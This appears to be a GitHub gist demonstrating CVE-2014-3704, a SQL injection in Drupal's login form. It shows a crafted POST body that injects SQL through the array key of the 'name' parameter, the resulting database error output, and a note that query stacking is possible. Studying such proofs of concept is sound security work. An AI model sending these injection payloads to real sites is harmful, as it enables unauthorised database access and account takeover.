Created
October 16, 2014 09:01
-
-
Save v-p-b/f76e7cd7b39f062606a6 to your computer and use it in GitHub Desktop.
CVE-2014-3704
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
name[0%20%20oxr%201%3d1%20--%20]=admin&name[0]=admin&pass=S2test&form_build_id=form-sn1hRoa-B1e-GhbPCBRswqRllD0noOdRnJE5iiO53pI&form_id=user_login_block&op=Log+in | |
<li><em class="placeholder">PDOException</em>: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'oxr 1=1 -- , 'admin' AND status = 1' at line 1: SELECT * FROM {users} WHERE name = :name_0 oxr 1=1 -- , :name_0 AND status = 1; Array | |
( | |
[:name_0 oxr 1=1 -- ] => admin | |
[:name_0] => admin | |
) |
From here we can use query stacking, as demonstrated here:
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
As we can see, the "oxr" string is interpreted as a keyword demonstrating that we are corrupting the structure of the SQL query.